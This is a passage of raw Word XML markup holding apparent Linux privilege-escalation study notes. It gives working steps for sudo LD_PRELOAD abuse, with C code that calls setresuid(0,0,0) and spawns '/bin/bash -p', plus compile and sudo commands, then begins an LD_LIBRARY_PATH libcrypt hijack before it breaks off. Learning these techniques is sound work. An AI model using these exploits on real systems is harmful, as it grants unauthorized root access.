    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022BF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Limitations of LD_Preload attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="279"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_PRELOAD will not work if the real user ID is different from the effective user ID.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="279"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo must be configured to preserve the LD_PRELOAD environment variable using the env_keep option</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="684"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check to see if we have </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">env_keep+=LD_Preload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="684"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1000125"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="351" name="image333.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image333.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId739"/>
                    <a:srcRect b="71074" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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22C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="684"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a file (preload.c) with the following contents:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022C9">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;sys/types.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022CA">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022CB">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">void _init() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022CC">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unsetenv("LD_PRELOAD");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022CD">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">setresuid(0,0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022CE">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system("/bin/bash -p");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022CF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pP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22D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="684"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will open a shell as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="684"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compile preload.c to preload.so:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="684"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gcc -fPIC -shared -nostartfiles -o /tmp/preload.so preload.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="684"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run any allowed program using sudo, while setting the LD_PRELOAD environment variable to the full path of the preload.so file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="684"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_PRELOAD=/tmp/preload.so</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> apache2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="684"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now you should have root!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3454400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="133" name="image121.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image121.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73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22D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022D8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_coxvbt12sz6h" w:id="307"/>
      <w:bookmarkEnd w:id="307"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_Library_PATH (environment variable)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022DB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4953000" cy="1143000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="201" name="image173.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image173.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId740"/>
                    <a:srcRect b="79191" l="0" r="34426" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4953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2DC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022DD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LD_Library_PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022DE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The LD_LIBRARY_PATH environment variable contains a set of directories where</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022DF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shared libraries are searched for first.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The ldd command can be used to print the shared libraries used by a program:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd /usr/sbin/apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="103"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By creating a shared library with the same name as one used by a program, and setting LD_LIBRARY_PATH to its parent directory, the program will load our shared library instead</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run ldd against the apache2 program file (or any other file you can run as sudo):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="805"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ldd /usr/sbin/apache2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="805"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1447800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="277" name="image269.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image269.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74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22E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="805"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hijacking shared objects using this method is hit or miss. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Choose one from the list and try it</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (libcrypt.so.1 seems to work well).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022E9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a file libcrypt.c with the following contents:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022EA">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022EB">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022EC">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">static void hijack() __attribute__((constructor));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000022ED">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
